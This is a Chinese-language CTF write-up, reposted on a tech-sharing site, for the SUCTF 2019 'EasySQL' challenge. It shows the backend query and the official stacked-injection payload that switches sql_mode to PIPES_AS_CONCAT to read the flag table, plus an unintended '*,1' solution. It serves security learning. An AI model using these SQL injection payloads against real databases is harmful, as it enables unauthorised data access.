标签：SUCTF PIPES Flag EasySQL flag 2019 mode sql select

[SUCTF 2019]EasySQL

一打开就是一个注入页面

尝试了一下常规的注入，都不能很好的注入。
那就尝试一下使用堆叠注入，
关键的查询代码是 select $post[‘query’]||flag from Flag

官方给的 payload 是
1;set sql_mode=PIPES_AS_CONCAT;select 1
拼接一下就是
select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag
关于 sql_mode : 它定义了 MySQL 应支持的 SQL 语法，以及应该在数据上执行何种确认检查.
PIPES_AS_CONCAT 将 || 视为字符串的连接操作符而非 “或” 运算符

关于 sql_mode 更多可以查看这个链接 : MySQL sql_mode 说明

还有就是这个模式下进行查询的时候，使用字母连接会报错，使用数字连接才会查询出数据，因为这个 || 相当于是将 select 1 和 select flag from flag 的结果拼接在一起.

关于非预期解 : *,1

拼接一下，不难理解 : select *,1||flag from Flag

等同于 select *,1 from Flag

标签：SUCTF,PIPES,Flag,EasySQL,flag,2019,mode,sql,select
来源： https://blog.csdn.net/qq_45624685/article/details/111999123

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。